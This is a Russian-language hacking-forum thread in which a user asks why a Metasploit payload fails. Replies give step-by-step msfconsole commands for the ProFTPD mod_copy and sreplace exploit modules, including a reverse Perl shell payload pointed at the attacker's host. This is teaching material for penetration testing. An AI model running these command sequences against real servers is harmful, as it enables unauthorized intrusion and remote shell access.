Toggle sidebar

И снова Metasploit (Payload)

kombat

kombat

Green Team
07.07.2018
12
2
И снова у меня проблемы с полезной нагрузкой на этот раз выбрал нужный эксплойт и нужную нагрузку но что то пошло не так

1.png


Подскажите что я делаю не так ?!
 
Сортировать по дате Сортировать по голосам
Добрый день.
Вы указываете не payload , а другой эксплойт.
К тому же ещё дублируете :>set payload exploit
После выбора рекомендуется просматривать опции командой show options.
Так Вы будете ориентированы в том,что от Вас требуется для атаки или теста.
И ,смотря какую CVE пытаетесь эксплуатировать.
Если работать с proftpd_modcopy_exec,то алгоритм может быть таким :
Код: 
msf > use exploit/unix/ftp/proftpd_modcopy_exec
msf exploit(proftpd_modcopy_exec) > show targets
msf exploit(proftpd_modcopy_exec) > set TARGET id_цели
msf exploit(proftpd_modcopy_exec) > show options - проверяем опции,сверяем
msf exploit(proftpd_modcopy_exec) > exploit
Эксплуатация с задействованием демона proftpd на сервере FTP может быть такой:
Код: 
msf> use exploit/unix/ftp/proftpd_modcopy_exec
set RHOST IP_цели
set SITEPATH /var/www/html/имя_тестовой_директории
set TARGETURI /имя_тестовой_директории/
set PAYLOAD cmd/unix/reverse_perl
set LHOST IP_атакующей машины
> run
Либо можете провести стандартную атаку:
Код: 
msf > use exploit/unix/ftp/proftpd_modcopy_exec
msf exploit(unix/ftp/proftpd_modcopy_exec) > set rhost IP_цели
msf exploit(unix/ftp/proftpd_modcopy_exec) > set sitepath /var/www/html
msf exploit(unix/ftp/proftpd_modcopy_exec) > set payload cmd/unix/reverse_perl
msf exploit(unix/ftp/proftpd_modcopy_exec) > run
И с модулем proftp_sreplace ведётся аналогичная работа с таким алгоритмом:
Код: 
msf > use exploit/linux/ftp/proftp_sreplace
      msf exploit(proftp_sreplace) > show targets
      msf exploit(proftp_sreplace) > set TARGET id_цели
      msf exploit(proftp_sreplace) > show options
      msf exploit(proftp_sreplace) > exploit
Из опций только не забываем указать необходимые параметры.
 
  • Нравится
Реакции: n01n02h, id2746, Underwood и ещё 1 человек
За 0 Против
Vertigo сказал(а):
Добрый день.
Вы указываете не payload , а другой эксплойт.
К тому же ещё дублируете :>set payload exploit
После выбора рекомендуется просматривать опции командой show options.
Так Вы будете ориентированы в том,что от Вас требуется для атаки или теста.
И ,смотря какую CVE пытаетесь эксплуатировать.
Если работать с proftpd_modcopy_exec,то алгоритм может быть таким :
Код: 
msf > use exploit/unix/ftp/proftpd_modcopy_exec
msf exploit(proftpd_modcopy_exec) > show targets
msf exploit(proftpd_modcopy_exec) > set TARGET id_цели
msf exploit(proftpd_modcopy_exec) > show options - проверяем опции,сверяем
msf exploit(proftpd_modcopy_exec) > exploit
Эксплуатация с задействованием демона proftpd на сервере FTP может быть такой:
Код: 
msf> use exploit/unix/ftp/proftpd_modcopy_exec
set RHOST IP_цели
set SITEPATH /var/www/html/имя_тестовой_директории
set TARGETURI /имя_тестовой_директории/
set PAYLOAD cmd/unix/reverse_perl
set LHOST IP_атакующей машины
> run
Либо можете провести стандартную атаку:
Код: 
msf > use exploit/unix/ftp/proftpd_modcopy_exec
msf exploit(unix/ftp/proftpd_modcopy_exec) > set rhost IP_цели
msf exploit(unix/ftp/proftpd_modcopy_exec) > set sitepath /var/www/html
msf exploit(unix/ftp/proftpd_modcopy_exec) > set payload cmd/unix/reverse_perl
msf exploit(unix/ftp/proftpd_modcopy_exec) > run
И с модулем proftp_sreplace ведётся аналогичная работа с таким алгоритмом:
Код: 
msf > use exploit/linux/ftp/proftp_sreplace
      msf exploit(proftp_sreplace) > show targets
      msf exploit(proftp_sreplace) > set TARGET id_цели
      msf exploit(proftp_sreplace) > show options
      msf exploit(proftp_sreplace) > exploit
Из опций только не забываем указать необходимые параметры.
Нажмите, чтобы раскрыть...
Спасибо
 
  • Нравится
Реакции: Vertigo
За 0 Против
для выбранного эксплоита можно посмотреть перечень доступных нагрузок командой:
msf> show payloads
Screenshot_2018-10-01-13-46-43-074_com.termux.png


После чего:
msf> set payload (тут выбранная из доступных нагрузок)

и продолжить настройку.
 
  • Нравится
Реакции: Vertigo и n01n02h
За 0 Против
id2746 сказал(а):
для выбранного эксплоита можно посмотреть перечень доступных нагрузок командой:
msf> show payloads
Посмотреть вложение 22591

После чего:
msf> set payload (тут выбранная из доступных нагрузок)

и продолжить настройку.
Нажмите, чтобы раскрыть...
Ух ты я не знал, спасибо за информацию
 
  • Нравится
Реакции: id2746
За 0 Против
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

Похожие темы

Luxkerr
  • Статья Статья
Статья Анти-советы: 5 ошибок новичков в кибербезе, которые замедляют процесс обучения
Ответы
0
Просмотры
2 тыс.
Курсы, гайды и сертификации
Luxkerr
Luxkerr
makar
  • Статья Статья
News Kali GPT: Будущее инструментов кибербезопасности на базе ИИ в Kali Linux
Ответы
2
Просмотры
2 тыс.
Новости кибербезопасности
f22
f22
from_localhost
  • Вопрос Вопрос
Проблема с Telebit
Ответы
15
Просмотры
2 тыс.
Вопросы и Ответы по ИБ (Q&A)
Exited3n
Exited3n
from_localhost
  • Вопрос Вопрос
Python Meterpreter Reverse TCP не работает туннель
Ответы
5
Просмотры
2 тыс.
Вопросы и Ответы по ИБ (Q&A)
from_localhost
from_localhost

Hacker Lab

Категории

CTF и практические задания
128
Linux и инфраструктура
32
Анонимность и приватность
121
Инструменты пентестера
169
Искусственный интеллект и ИБ
4
Кибербезопасность
692
Конкурсы и активности
62
Криптография и шифрование
55
Мобильная безопасность
42
Новости и события
143
Программирование для ИБ
227
Работа и обучение в ИБ
125
Сетевые технологии
24
Форензика и OSINT
192

Наши курсы

Команда онлайн

Пользователи онлайн

Всего: 2 227 (пользователей: 31, гостей: 2 196)

Статистика форума

Темы
50 775
Сообщения
345 565
Пользователи
138 896
Новый пользователь
BOBIKXYZ
Верх Низ
Назад